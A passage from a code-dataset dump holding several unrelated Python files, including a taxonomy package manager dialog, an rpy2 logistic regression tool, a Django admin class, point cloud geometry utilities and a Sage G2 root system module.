(_("PWD Manifest (taxonomyPackage.xml)"), "taxonomyPackage.xml"),
(_("pre-PWD Manifest (*.taxonomyPackage.xml)"), "*.taxonomyPackage.xml"),
(_("pre-PWD Oasis Catalog (*catalog.xml)"), "*catalog.xml")],
defaultextension=".zip")
if filename:
# check if a package is selected (any file in a directory containing an __init__.py
self.cntlr.config["packageOpenDir"] = os.path.dirname(filename)
packageInfo = PackageManager.packageInfo(self.cntlr, filename, packageManifestName=self.manifestNamePattern)
self.loadFoundPackageInfo(packageInfo, filename)
def findOnWeb(self):
url = DialogURL.askURL(self)
if url: # url is the in-cache or local file
packageInfo = PackageManager.packageInfo(self.cntlr, url, packageManifestName=self.manifestNamePattern)
self.cntlr.showStatus("") # clear web loading status
self.loadFoundPackageInfo(packageInfo, url)
def manifestName(self):
self.manifestNamePattern = simpledialog.askstring(_("Archive manifest file name pattern"),
_("Provide non-standard archive manifest file name pattern (e.g., *taxonomyPackage.xml). \n"
"Uses unix file name pattern matching. \n"
"Multiple manifest files are supported in archive (such as oasis catalogs). \n"
"(If blank, search for either .taxonomyPackage.xml or catalog.xml). "),
initialvalue=self.manifestNamePattern,
parent=self)
def loadFoundPackageInfo(self, packageInfo, url):
if packageInfo and packageInfo.get("name"):
self.addPackageInfo(packageInfo)
self.loadTreeViews()
else:
messagebox.showwarning(_("Package is not itself a taxonomy package. "),
_("File does not itself contain a manifest file: \n\n{0}\n\n "
"If opening an archive file, the manifest file search pattern currently is \"\", please press \"Manifest\" to change manifest file name pattern, e.g.,, \"*.taxonomyPackage.xml\", if needed. ")
.format(url),
parent=self)
def removePackageInfo(self, name, version):
# find package entry
packagesList = self.packagesConfig["packages"]
j = -1
for i, packageInfo in enumerate(packagesList):
if packageInfo['name'] == name and packageInfo['version'] == version:
j = i
break
if 0 <= j < len(packagesList):
del self.packagesConfig["packages"][i]
self.packagesConfigChanged = True
def addPackageInfo(self, packageInfo):
name = packageInfo["name"]
version = packageInfo["version"]
self.removePackageInfo(name, version) # remove any prior entry for this package
self.packageNamesWithNewerFileDates.discard(name) # no longer has an update available
self.packagesConfig["packages"].append(packageInfo)
PackageManager.rebuildRemappings(self.cntlr)
self.packagesConfigChanged = True
def packageEnable(self):
if 0 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]):
packageInfo = self.packagesConfig["packages"][self.selectedPackageIndex]
if self.packageEnableButton['text'] == self.ENABLE:
packageInfo["status"] = "enabled"
self.packageEnableButton['text'] = self.DISABLE
elif self.packageEnableButton['text'] == self.DISABLE:
packageInfo["status"] = "disabled"
self.packageEnableButton['text'] = self.ENABLE
self.packagesConfigChanged = True
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
def packageMoveUp(self):
if 1 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]):
packages = self.packagesConfig["packages"]
packageInfo = packages[self.selectedPackageIndex]
del packages[self.selectedPackageIndex]
packages.insert(self.selectedPackageIndex -1, packageInfo)
self.packagesConfigChanged = True
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
def packageMoveDown(self):
if 0 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]) - 1:
packages = self.packagesConfig["packages"]
packageInfo = packages[self.selectedPackageIndex]
del packages[self.selectedPackageIndex]
packages.insert(self.selectedPackageIndex + 1, packageInfo)
self.packagesConfigChanged = True
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
def packageReload(self):
if 0 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]):
packageInfo = self.packagesConfig["packages"][self.selectedPackageIndex]
url = packageInfo.get("URL")
if url:
packageInfo = PackageManager.packageInfo(self.cntlr, url, reload=True, packageManifestName=packageInfo.get("manifestName"))
if packageInfo:
self.addPackageInfo(packageInfo)
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
self.cntlr.showStatus(_("{0} reloaded").format(packageInfo.get("name")), clearAfter=5000)
else:
messagebox.showwarning(_("Package error"),
_("File or package cannot be reloaded: \n\n{0}")
.format(url),
parent=self)
def packageRemove(self):
if 0 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]):
packageInfo = self.packagesConfig["packages"][self.selectedPackageIndex]
self.removePackageInfo(packageInfo["name"], packageInfo["version"])
self.packagesConfigChanged = True
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
def enableAll(self):
self.enableDisableAll(True)
def disableAll(self):
self.enableDisableAll(False)
def enableDisableAll(self, doEnable):
for iPkg in range(len(self.packagesConfig["packages"])):
packageInfo = self.packagesConfig["packages"][iPkg]
if doEnable:
packageInfo["status"] = "enabled"
self.packageEnableButton['text'] = self.DISABLE
else:
packageInfo["status"] = "disabled"
self.packageEnableButton['text'] = self.ENABLE
self.packagesConfigChanged = True
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
|
py | 1a30569524fe48b7b19699ba32d0e32ab5a2a404 | #!/usr/bin/env python
# from galaxy import eggs
import sys
import rpy2.rinterface as ri
import rpy2.rlike.container as rlc
# from rpy import *
import rpy2.robjects as robjects
r = robjects.r
def stop_err(msg):
sys.stderr.write(msg)
sys.exit()
infile = sys.argv[1]
y_col = int(sys.argv[2]) - 1
x_cols = sys.argv[3].split(",")
outfile = sys.argv[4]
print("Predictor columns: %s; Response column: %d" % (x_cols, y_col + 1))
fout = open(outfile, "w")
elems = []
for i, line in enumerate(file(infile)): # noqa F821
line = line.rstrip("\r\n")
if len(line) > 0 and not line.startswith("#"):
elems = line.split("\t")
break
if i == 30:
break # Hopefully we'll never get here...
if len(elems) < 1:
stop_err(
"The data in your input dataset is either missing or not formatted properly."
)
y_vals = []
x_vals = []
x_vector = []
for k, col in enumerate(x_cols):
x_cols[k] = int(col) - 1
x_vals.append([])
NA = "NA"
for ind, line in enumerate(file(infile)): # noqa F821
if line and not line.startswith("#"):
try:
fields = line.split("\t")
try:
yval = float(fields[y_col])
except Exception:
yval = r("NA")
y_vals.append(yval)
for k, col in enumerate(x_cols):
try:
xval = float(fields[col])
except Exception:
xval = r("NA")
x_vals[k].append(xval)
x_vector.append(xval)
except Exception as e:
print(e)
# x_vals1 = numpy.asarray(x_vals).transpose()
check1 = 0
check0 = 0
for i in y_vals:
if i == 1:
check1 = 1
if i == 0:
check0 = 1
if check1 == 0 or check0 == 0:
sys.exit("Warning: logistic regression must have at least two classes")
for i in y_vals:
if i not in [1, 0, r("NA")]:
print(str(i), file=fout)
sys.exit(
"Warning: the current version of this tool can run only with two classes and need to be labeled as 0 and 1."
)
# dat= r.list(x=array(x_vals1), y=y_vals)
novif = 0
# set_default_mode(NO_CONVERSION)
# try:
# linear_model = r.glm(r("y ~ x"), data = r.na_exclude(dat),family="binomial")
# #r('library(car)')
# #r.assign('dat',dat)
# #r.assign('ncols',len(x_cols))
# #r.vif(r('glm(dat$y ~ ., data = na.exclude(data.frame(as.matrix(dat$x,ncol=ncols))->datx),family="binomial")')).as_py()
#
# except Exception as rex:
# stop_err("Error performing logistic regression on the input data.\nEither the response column or one of the predictor columns contain only non-numeric or invalid values.")
fv = robjects.FloatVector(x_vector)
m = r["matrix"](fv, ncol=len(x_cols), byrow=True)
# ensure order for generating formula
od = rlc.OrdDict([("y", robjects.FloatVector(y_vals)), ("x", m)])
dat = robjects.DataFrame(od)
# convert dat.names: ["y","x.1","x.2"] to formula string: 'y ~ x.1 + x.2'
formula = " + ".join(dat.names).replace("+", "~", 1)
print(formula)
try:
linear_model = r.glm(formula, data=r["na.exclude"](dat), family="binomial")
except Exception:
stop_err(
"Error performing linear regression on the input data.\nEither the response column or one of the predictor columns contain only non-numeric or invalid values."
)
if len(x_cols) > 1:
try:
r("library(car)")
r.assign("dat", dat)
r.assign("ncols", len(x_cols))
# vif=r.vif(r('glm(dat$y ~ ., data = na.exclude(data.frame(as.matrix(dat$x,ncol=ncols))->datx),family="binomial")'))
od2 = rlc.OrdDict([("datx", m)])
glm_data_frame = robjects.DataFrame(od2)
glm_result = r.glm(
"dat$y ~ .", data=r["na.exclude"](glm_data_frame), family="binomial"
)
print("Have glm")
vif = r.vif(glm_result)
except Exception as rex:
print(rex)
else:
novif = 1
# set_default_mode(BASIC_CONVERSION)
# coeffs=linear_model.as_py()['coefficients']
coeffs = linear_model.rx2("coefficients")
# null_deviance=linear_model.as_py()['null.deviance']
null_deviance = linear_model.rx2("null.deviance")[0]
# residual_deviance=linear_model.as_py()['deviance']
residual_deviance = linear_model.rx2("deviance")[0]
# yintercept= coeffs['(Intercept)']
yintercept = coeffs.rx2("(Intercept)")[0]
summary = r.summary(linear_model)
# co = summary.get('coefficients', 'NA')
co = summary.rx2("coefficients")
print(co)
"""
if len(co) != len(x_vals)+1:
stop_err("Stopped performing logistic regression on the input data, since one of the predictor columns contains only non-numeric or invalid values.")
"""
try:
yintercept = r.round(float(yintercept), digits=10)[0]
# pvaly = r.round(float(co[0][3]), digits=10)
pvaly = r.round(float(co.rx(1, 4)[0]), digits=10)[0]
except Exception as e:
print(str(e))
print("response column\tc%d" % (y_col + 1), file=fout)
tempP = []
for i in x_cols:
tempP.append("c" + str(i + 1))
tempP = ",".join(tempP)
print("predictor column(s)\t%s" % (tempP), file=fout)
print("Y-intercept\t%s" % (yintercept), file=fout)
print("p-value (Y-intercept)\t%s" % (pvaly), file=fout)
print(coeffs)
if len(x_vals) == 1: # Simple linear regression case with 1 predictor variable
try:
# slope = r.round(float(coeffs['x']), digits=10)
raw_slope = coeffs.rx2("x")[0]
slope = r.round(float(raw_slope), digits=10)[0]
except Exception:
slope = "NA"
try:
# pval = r.round(float(co[1][3]), digits=10)
pval = r.round(float(co.rx2(2, 4)[0]), digits=10)[0]
except Exception:
pval = "NA"
print("Slope (c%d)\t%s" % (x_cols[0] + 1, slope), file=fout)
print("p-value (c%d)\t%s" % (x_cols[0] + 1, pval), file=fout)
else: # Multiple regression case with >1 predictors
ind = 1
# while ind < len(coeffs.keys()):
print(len(coeffs.names))
while ind < len(coeffs.names):
try:
# slope = r.round(float(coeffs['x'+str(ind)]), digits=10)
raw_slope = coeffs.rx2("x." + str(ind))[0]
slope = r.round(float(raw_slope), digits=10)[0]
except Exception:
slope = "NA"
print("Slope (c%d)\t%s" % (x_cols[ind - 1] + 1, slope), file=fout)
try:
# pval = r.round(float(co[ind][3]), digits=10)
pval = r.round(float(co.rx2(ind + 1, 4)[0]), digits=10)[0]
except Exception:
pval = "NA"
print("p-value (c%d)\t%s" % (x_cols[ind - 1] + 1, pval), file=fout)
ind += 1
# rsq = summary.get('r.squared','NA')
rsq = summary.rx2("r.squared")
if rsq == ri.RNULLType():
rsq = "NA"
else:
rsq = rsq[0]
try:
# rsq= r.round(float((null_deviance-residual_deviance)/null_deviance), digits=5)
rsq = r.round(float((null_deviance - residual_deviance) / null_deviance), digits=5)[
0
]
# null_deviance= r.round(float(null_deviance), digits=5)
null_deviance = r.round(float(null_deviance), digits=5)[0]
# residual_deviance= r.round(float(residual_deviance), digits=5)
residual_deviance = r.round(float(residual_deviance), digits=5)[0]
except Exception:
pass
print("Null deviance\t%s" % (null_deviance), file=fout)
print("Residual deviance\t%s" % (residual_deviance), file=fout)
print("pseudo R-squared\t%s" % (rsq), file=fout)
print("\n", file=fout)
print("vif", file=fout)
if novif == 0:
# py_vif=vif.as_py()
count = 0
for i in sorted(vif.names):
print("c" + str(x_cols[count] + 1), str(vif.rx2(i)[0]), file=fout)
count += 1
elif novif == 1:
print("vif can calculate only when model have more than 1 predictor", file=fout)
|
py | 1a3057b5508f146d4372d9bbb5ae1f72c305925b | from django.contrib import admin
from .models import Listing
class ListingAdmin(admin.ModelAdmin):
list_display = ('id', 'title', 'is_published', 'price', 'list_date', 'realtor')
list_display_links = ('id', 'title')
list_filter = ('realtor',)
list_editable = ('is_published',)
search_fields = ('title', 'description', 'address', 'city', 'zipcode', 'price')
list_per_page = 25
admin.site.register(Listing, ListingAdmin) |
py | 1a3057e7bf1790f7a33ff516356a2149953eee24 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class StorageAccountItem(Model):
"""The storage account item containing storage account metadata.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Storage identifier.
:vartype id: str
:ivar resource_id: Storage account resource Id.
:vartype resource_id: str
:ivar attributes: The storage account management attributes.
:vartype attributes: ~azure.keyvault.models.StorageAccountAttributes
:ivar tags: Application specific metadata in the form of key-value pairs.
:vartype tags: dict[str, str]
"""
_validation = {
'id': {'readonly': True},
'resource_id': {'readonly': True},
'attributes': {'readonly': True},
'tags': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'attributes': {'key': 'attributes', 'type': 'StorageAccountAttributes'},
'tags': {'key': 'tags', 'type': '{str}'},
}
def __init__(self, **kwargs):
super(StorageAccountItem, self).__init__(**kwargs)
self.id = None
self.resource_id = None
self.attributes = None
self.tags = None
|
py | 1a30587df351cc55b048aef37b79c75f822eba8a | #!/usr/bin/python3
"""
Copyright 2018-2019 Firmin.Sun ([email protected])
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# -----------------------------------------------------
# @Time : 11/8/2018 4:54 PM
# @Author : Firmin.Sun ([email protected])
# @Software: ZJ_AI
# -----------------------------------------------------
# -*- coding: utf-8 -*-
import keras
import numpy as np
import cv2
from PIL import Image
def read_image_bgr(path):
'''
:param path:
:return: (h, w, 3)
'''
try:
image = np.asarray(Image.open(path).convert('RGB'))
except Exception as ex:
print(path)
return image[:, :, ::-1].copy()
def preprocess_image(x):
# mostly identical to "https://github.com/fchollet/keras/blob/master/keras/applications/imagenet_utils.py"
# except for converting RGB -> BGR since we assume BGR already
x = x.astype(keras.backend.floatx())
if keras.backend.image_data_format() == 'channels_first':
if x.ndim == 3:
x[0, :, :] -= 103.939
x[1, :, :] -= 116.779
x[2, :, :] -= 123.68
else:
x[:, 0, :, :] -= 103.939
x[:, 1, :, :] -= 116.779
x[:, 2, :, :] -= 123.68
else:
x[..., 0] -= 103.939
x[..., 1] -= 116.779
x[..., 2] -= 123.68
return x
def resize_image(image, min_side=448, max_side=448):
'''
resize image to dsize
:param img: input (h, w, 3) = (rows, cols, 3)
:param size:
:return: out (h, w, 3)
'''
(h, w, _) = image.shape
scale = np.asarray((min_side, max_side),dtype=float) / np.asarray((h, w),dtype=float)
# resize the image with the computed scale
# cv2.resize(image, (w, h))
img = cv2.resize(image, (min_side, max_side))
return img, scale
|
py | 1a3058ecaea4ad3eec37bbe8cab4192826efd69a | import os
import unittest
import pytest
from nose.plugins.attrib import attr
from conans.test.assets.multi_config import multi_config_files
from conans.test.utils.tools import TestClient
@attr("slow")
@pytest.mark.slow
@pytest.mark.tool_cmake
class CMakeConfigsTest(unittest.TestCase):
def test_test_package_configs(self):
client = TestClient()
name = "Hello0"
files = multi_config_files(name, test=True)
client.save(files, clean_first=True)
client.run("create . user/testing")
self.assertIn("Hello Release Hello0", client.out)
self.assertIn("Hello Debug Hello0", client.out)
def test_cmake_multi(self):
client = TestClient()
deps = None
for name in ["Hello0", "Hello1", "Hello2"]:
files = multi_config_files(name, test=False, deps=deps)
client.save(files, clean_first=True)
deps = [name]
if name != "Hello2":
client.run("export . lasote/stable")
client.run('install . --build missing')
client.run("build .")
cmd = os.sep.join([".", "bin", "say_hello"])
client.run_command(cmd)
self.assertIn("Hello Release Hello2 Hello Release Hello1 Hello Release Hello0",
" ".join(str(client.out).splitlines()))
client.run_command(cmd + "_d")
self.assertIn("Hello Debug Hello2 Hello Debug Hello1 Hello Debug Hello0",
" ".join(str(client.out).splitlines()))
|
py | 1a3058fb23ba11df9eb6228e028a03afc4ae99c2 | """
Defines CPU Options for use in the CPU target
"""
class FastMathOptions(object):
"""
Options for controlling fast math optimization.
"""
def __init__(self, value):
# https://releases.llvm.org/7.0.0/docs/LangRef.html#fast-math-flags
valid_flags = {
'fast',
'nnan', 'ninf', 'nsz', 'arcp',
'contract', 'afn', 'reassoc',
}
if isinstance(value, FastMathOptions):
self.flags = value.flags.copy()
elif value is True:
self.flags = {'fast'}
elif value is False:
self.flags = set()
elif isinstance(value, set):
invalid = value - valid_flags
if invalid:
raise ValueError("Unrecognized fastmath flags: %s" % invalid)
self.flags = value
elif isinstance(value, dict):
invalid = set(value.keys()) - valid_flags
if invalid:
raise ValueError("Unrecognized fastmath flags: %s" % invalid)
self.flags = {v for v, enable in value.items() if enable}
else:
msg = "Expected fastmath option(s) to be either a bool, dict or set"
raise ValueError(msg)
def __bool__(self):
return bool(self.flags)
__nonzero__ = __bool__
def __repr__(self):
return f"FastMathOptions({self.flags})"
class ParallelOptions(object):
"""
Options for controlling auto parallelization.
"""
def __init__(self, value):
if isinstance(value, bool):
self.enabled = value
self.comprehension = value
self.reduction = value
self.inplace_binop = value
self.setitem = value
self.numpy = value
self.stencil = value
self.fusion = value
self.prange = value
elif isinstance(value, dict):
self.enabled = True
self.comprehension = value.pop('comprehension', True)
self.reduction = value.pop('reduction', True)
self.inplace_binop = value.pop('inplace_binop', True)
self.setitem = value.pop('setitem', True)
self.numpy = value.pop('numpy', True)
self.stencil = value.pop('stencil', True)
self.fusion = value.pop('fusion', True)
self.prange = value.pop('prange', True)
if value:
msg = "Unrecognized parallel options: %s" % value.keys()
raise NameError(msg)
elif isinstance(value, ParallelOptions):
self.enabled = value.enabled
self.comprehension = value.comprehension
self.reduction = value.reduction
self.inplace_binop = value.inplace_binop
self.setitem = value.setitem
self.numpy = value.numpy
self.stencil = value.stencil
self.fusion = value.fusion
self.prange = value.prange
else:
msg = "Expect parallel option to be either a bool or a dict"
raise ValueError(msg)
class InlineOptions(object):
"""
Options for controlling inlining
"""
def __init__(self, value):
ok = False
if isinstance(value, str):
if value in ('always', 'never'):
ok = True
else:
ok = hasattr(value, '__call__')
if ok:
self._inline = value
else:
msg = ("kwarg 'inline' must be one of the strings 'always' or "
"'never', or it can be a callable that returns True/False. "
"Found value %s" % value)
raise ValueError(msg)
@property
def is_never_inline(self):
"""
True if never inline
"""
return self._inline == 'never'
@property
def is_always_inline(self):
"""
True if always inline
"""
return self._inline == 'always'
@property
def has_cost_model(self):
"""
True if a cost model is provided
"""
return not (self.is_always_inline or self.is_never_inline)
@property
def value(self):
"""
The raw value
"""
return self._inline
|
py | 1a305a69c89f7036862c6e0ab50cc0e0a291f95e | import math
import numpy as np
import torch
from scipy.spatial import cKDTree
def setup_seed(seed):
torch.backends.cudnn.deterministic = True
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
def square_dists(points1, points2):
'''
Calculate square dists between two group points
:param points1: shape=(B, N, C)
:param points2: shape=(B, M, C)
:return:
'''
B, N, C = points1.shape
_, M, _ = points2.shape
dists = torch.sum(torch.pow(points1, 2), dim=-1).view(B, N, 1) + \
torch.sum(torch.pow(points2, 2), dim=-1).view(B, 1, M)
dists -= 2 * torch.matmul(points1, points2.permute(0, 2, 1))
#dists = torch.where(dists < 0, torch.ones_like(dists) * 1e-7, dists) # Very Important for dist = 0.
return dists.float()
def random_select_points(pc, m):
if m < 0:
idx = np.arange(pc.shape[0])
np.random.shuffle(idx)
return pc[idx, :]
n = pc.shape[0]
replace = False if n >= m else True
idx = np.random.choice(n, size=(m, ), replace=replace)
return pc[idx, :]
def generate_rotation_x_matrix(theta):
mat = np.eye(3, dtype=np.float32)
mat[1, 1] = math.cos(theta)
mat[1, 2] = -math.sin(theta)
mat[2, 1] = math.sin(theta)
mat[2, 2] = math.cos(theta)
return mat
def generate_rotation_y_matrix(theta):
mat = np.eye(3, dtype=np.float32)
mat[0, 0] = math.cos(theta)
mat[0, 2] = math.sin(theta)
mat[2, 0] = -math.sin(theta)
mat[2, 2] = math.cos(theta)
return mat
def generate_rotation_z_matrix(theta):
mat = np.eye(3, dtype=np.float32)
mat[0, 0] = math.cos(theta)
mat[0, 1] = -math.sin(theta)
mat[1, 0] = math.sin(theta)
mat[1, 1] = math.cos(theta)
return mat
def generate_random_rotation_matrix(angle1=-45, angle2=45):
thetax = np.random.uniform() * np.pi * angle2 / 180.0
thetay = np.random.uniform() * np.pi * angle2 / 180.0
thetaz = np.random.uniform() * np.pi * angle2 / 180.0
matx = generate_rotation_x_matrix(thetax)
maty = generate_rotation_y_matrix(thetay)
matz = generate_rotation_z_matrix(thetaz)
return np.dot(matx, np.dot(maty, matz))
def generate_random_tranlation_vector(range1=-0.5, range2=0.5):
tranlation_vector = np.random.uniform(range1, range2, size=(3, )).astype(np.float32)
return tranlation_vector
def transform(pc, R, t=None):
pc = np.dot(pc, R.T)
if t is not None:
pc = pc + t
return pc
def batch_transform(batch_pc, batch_R, batch_t=None):
'''
:param batch_pc: shape=(B, N, 3)
:param batch_R: shape=(B, 3, 3)
:param batch_t: shape=(B, 3)
:return: shape(B, N, 3)
'''
transformed_pc = torch.matmul(batch_pc, batch_R.permute(0, 2, 1).contiguous())
if batch_t is not None:
transformed_pc = transformed_pc + torch.unsqueeze(batch_t, 1)
return transformed_pc
# The transformation between unit quaternion and rotation matrix is referenced to
# https://zhuanlan.zhihu.com/p/45404840
def quat2mat(quat):
w, x, y, z = quat
R = np.zeros((3, 3), dtype=np.float32)
R[0][0] = 1 - 2*y*y - 2*z*z
R[0][1] = 2*x*y - 2*z*w
R[0][2] = 2*x*z + 2*y*w
R[1][0] = 2*x*y + 2*z*w
R[1][1] = 1 - 2*x*x - 2*z*z
R[1][2] = 2*y*z - 2*x*w
R[2][0] = 2*x*z - 2*y*w
R[2][1] = 2*y*z + 2*x*w
R[2][2] = 1 - 2*x*x - 2*y*y
return R
def batch_quat2mat(batch_quat):
'''
:param batch_quat: shape=(B, 4)
:return:
'''
w, x, y, z = batch_quat[:, 0], batch_quat[:, 1], batch_quat[:, 2], \
batch_quat[:, 3]
device = batch_quat.device
B = batch_quat.size()[0]
R = torch.zeros(dtype=torch.float, size=(B, 3, 3)).to(device)
R[:, 0, 0] = 1 - 2 * y * y - 2 * z * z
R[:, 0, 1] = 2 * x * y - 2 * z * w
R[:, 0, 2] = 2 * x * z + 2 * y * w
R[:, 1, 0] = 2 * x * y + 2 * z * w
R[:, 1, 1] = 1 - 2 * x * x - 2 * z * z
R[:, 1, 2] = 2 * y * z - 2 * x * w
R[:, 2, 0] = 2 * x * z - 2 * y * w
R[:, 2, 1] = 2 * y * z + 2 * x * w
R[:, 2, 2] = 1 - 2 * x * x - 2 * y * y
return R
def mat2quat(mat):
w = math.sqrt(mat[0, 0] + mat[1, 1] + mat[2, 2] + 1 + 1e-8) / 2
x = (mat[2, 1] - mat[1, 2]) / (4 * w + 1e-8)
y = (mat[0, 2] - mat[2, 0]) / (4 * w + 1e-8)
z = (mat[1, 0] - mat[0, 1]) / (4 * w + 1e-8)
return w, x, y, z
def jitter_point_cloud(pc, sigma=0.01, clip=0.05):
N, C = pc.shape
assert(clip > 0)
#jittered_data = np.clip(sigma * np.random.randn(N, C), -1*clip, clip).astype(np.float32)
jittered_data = np.clip(
np.random.normal(0.0, scale=sigma, size=(N, 3)),
-1 * clip, clip).astype(np.float32)
jittered_data += pc
return jittered_data
def shift_point_cloud(pc, shift_range=0.1):
N, C = pc.shape
shifts = np.random.uniform(-shift_range, shift_range, (1, C)).astype(np.float32)
pc += shifts
return pc
def random_scale_point_cloud(pc, scale_low=0.8, scale_high=1.25):
scale = np.random.uniform(scale_low, scale_high, 1)
pc *= scale
return pc
def inv_R_t(R, t):
inv_R = R.permute(0, 2, 1).contiguous()
inv_t = - inv_R @ t[..., None]
return inv_R, torch.squeeze(inv_t, -1)
def uniform_2_sphere(num: int = None):
"""Uniform sampling on a 2-sphere
Source: https://gist.github.com/andrewbolster/10274979
Args:
num: Number of vectors to sample (or None if single)
Returns:
Random Vector (np.ndarray) of size (num, 3) with norm 1.
If num is None returned value will have size (3,)
"""
if num is not None:
phi = np.random.uniform(0.0, 2 * np.pi, num)
cos_theta = np.random.uniform(-1.0, 1.0, num)
else:
phi = np.random.uniform(0.0, 2 * np.pi)
cos_theta = np.random.uniform(-1.0, 1.0)
theta = np.arccos(cos_theta)
x = np.sin(theta) * np.cos(phi)
y = np.sin(theta) * np.sin(phi)
z = np.cos(theta)
return np.stack((x, y, z), axis=-1)
def random_crop(pc, p_keep):
rand_xyz = uniform_2_sphere()
centroid = np.mean(pc[:, :3], axis=0)
pc_centered = pc[:, :3] - centroid
dist_from_plane = np.dot(pc_centered, rand_xyz)
mask = dist_from_plane > np.percentile(dist_from_plane, (1.0 - p_keep) * 100)
return pc[mask, :]
def shuffle_pc(pc):
return np.random.permutation(pc)
def flip_pc(pc, r=0.5):
if np.random.random() > r:
pc[:, 1] = -1 * pc[:, 1]
return pc
def angle(v1: torch.Tensor, v2: torch.Tensor):
"""Compute angle between 2 vectors
For robustness, we use the same formulation as in PPFNet, i.e.
angle(v1, v2) = atan2(cross(v1, v2), dot(v1, v2)).
This handles the case where one of the vectors is 0.0, since torch.atan2(0.0, 0.0)=0.0
Args:
v1: (B, *, 3)
v2: (B, *, 3)
Returns:
"""
cross_prod = torch.stack([v1[..., 1] * v2[..., 2] - v1[..., 2] * v2[..., 1],
v1[..., 2] * v2[..., 0] - v1[..., 0] * v2[..., 2],
v1[..., 0] * v2[..., 1] - v1[..., 1] * v2[..., 0]], dim=-1)
cross_prod_norm = torch.norm(cross_prod, dim=-1)
dot_prod = torch.sum(v1 * v2, dim=-1)
return torch.atan2(cross_prod_norm, dot_prod)
|
py | 1a305d3908c23751a396191f4d9795628afa0074 | """
Root system data for type G
"""
#*****************************************************************************
# Copyright (C) 2008-2009 Daniel Bump
# Copyright (C) 2008-2009 Justin Walker
# Copyright (C) 2008-2013 Nicolas M. Thiery <nthiery at users.sf.net>
#
# Distributed under the terms of the GNU General Public License (GPL)
# http://www.gnu.org/licenses/
#*****************************************************************************
from __future__ import print_function
from __future__ import absolute_import
from . import ambient_space
from sage.sets.family import Family
from sage.combinat.root_system.root_lattice_realizations import RootLatticeRealizations
class AmbientSpace(ambient_space.AmbientSpace):
"""
EXAMPLES::
sage: e = RootSystem(['G',2]).ambient_space(); e
Ambient space of the Root system of type ['G', 2]
One can not construct the ambient lattice because the simple
coroots have rational coefficients::
sage: e.simple_coroots()
Finite family {1: (0, 1, -1), 2: (1/3, -2/3, 1/3)}
sage: e.smallest_base_ring()
Rational Field
By default, this ambient space uses the barycentric projection for plotting::
sage: L = RootSystem(["G",2]).ambient_space()
sage: e = L.basis()
sage: L._plot_projection(e[0])
(1/2, 989/1142)
sage: L._plot_projection(e[1])
(-1, 0)
sage: L._plot_projection(e[2])
(1/2, -989/1142)
sage: L = RootSystem(["A",3]).ambient_space()
sage: l = L.an_element(); l
(2, 2, 3, 0)
sage: L._plot_projection(l)
(0, -1121/1189, 7/3)
.. SEEALSO::
- :meth:`sage.combinat.root_system.root_lattice_realizations.RootLatticeRealizations.ParentMethods._plot_projection`
TESTS::
sage: TestSuite(e).run()
sage: [WeylDim(['G',2],[a,b]) for a,b in [[0,0], [1,0], [0,1], [1,1]]] # indirect doctest
[1, 7, 14, 64]
"""
def dimension(self):
"""
EXAMPLES::
sage: e = RootSystem(['G',2]).ambient_space()
sage: e.dimension()
3
"""
return 3
def simple_root(self, i):
"""
EXAMPLES::
sage: CartanType(['G',2]).root_system().ambient_space().simple_roots()
Finite family {1: (0, 1, -1), 2: (1, -2, 1)}
"""
return self.monomial(1)-self.monomial(2) if i == 1 else self.monomial(0)-2*self.monomial(1)+self.monomial(2)
def positive_roots(self):
"""
EXAMPLES::
sage: CartanType(['G',2]).root_system().ambient_space().positive_roots()
[(0, 1, -1), (1, -2, 1), (1, -1, 0), (1, 0, -1), (1, 1, -2), (2, -1, -1)]
"""
return [ self(v) for v in
[[0,1,-1],[1,-2,1],[1,-1,0],[1,0,-1],[1,1,-2],[2,-1,-1]]]
def negative_roots(self):
"""
EXAMPLES::
sage: CartanType(['G',2]).root_system().ambient_space().negative_roots()
[(0, -1, 1), (-1, 2, -1), (-1, 1, 0), (-1, 0, 1), (-1, -1, 2), (-2, 1, 1)]
"""
return [ self(v) for v in
[[0,-1,1],[-1,2,-1],[-1,1,0],[-1,0,1],[-1,-1,2],[-2,1,1]]]
def fundamental_weights(self):
"""
EXAMPLES::
sage: CartanType(['G',2]).root_system().ambient_space().fundamental_weights()
Finite family {1: (1, 0, -1), 2: (2, -1, -1)}
"""
return Family({ 1: self([1,0,-1]),
2: self([2,-1,-1])})
_plot_projection = RootLatticeRealizations.ParentMethods.__dict__['_plot_projection_barycentric']
from .cartan_type import CartanType_standard_finite, CartanType_simple, CartanType_crystallographic
class CartanType(CartanType_standard_finite, CartanType_simple, CartanType_crystallographic):
def __init__(self):
"""
EXAMPLES::
sage: ct = CartanType(['G',2])
sage: ct
['G', 2]
sage: ct._repr_(compact = True)
'G2'
sage: ct.is_irreducible()
True
sage: ct.is_finite()
True
sage: ct.is_crystallographic()
True
sage: ct.is_simply_laced()
False
sage: ct.dual()
['G', 2] relabelled by {1: 2, 2: 1}
sage: ct.affine()
['G', 2, 1]
TESTS::
sage: TestSuite(ct).run()
"""
CartanType_standard_finite.__init__(self, "G", 2)
def _latex_(self):
r"""
Return a latex representation of ``self``.
EXAMPLES::
